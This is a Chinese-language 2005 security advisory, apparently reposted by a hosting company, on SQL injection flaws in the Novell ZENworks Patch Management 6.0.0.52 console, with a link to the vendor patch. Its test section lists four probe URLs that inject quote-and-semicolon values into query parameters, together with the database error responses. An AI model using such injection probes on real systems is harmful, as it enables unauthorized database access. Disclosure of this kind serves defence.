Novell ZENworks补丁管理多个SQL注入漏洞

发布日期：2005-10-28
更新日期：2005-10-28

受影响系统：

Novell ZENworks Patch Managemen 6.0.0.52

不受影响系统：

Novell ZENworks Patch Managemen 6.2

描述：

---

BUGTRAQ ID: 15220

Novell的ZENworks组件允许组织从SuSE Linux平台管理Windows工作站，Patch Management是其中用于管理补丁的组件。

ZENworks Patch Management的管理控制台中存在多个SQL注入漏洞，远程攻击者可以完全入侵基础数据库系统。

但如果要利用这个漏洞，管理员应至少手动创建了一个非特权用户帐号。

<*来源：Dennis Rand （DER@cowi.dk）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113043212407138&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://192.168.1.10/computers/default.asp?sort=&Direction=';
Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, @Search = ', @groupFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
Response from server: Incorrecy syntax near ', @delimiter='.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter=save&Page=rep
Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

建议：

---

厂商补丁：

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

* Novell Upgrade ZEN_PatchMgmt_Upd6.2.iso
http://download.novell.com/Download?buildid=5_kRStyf9wU~

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!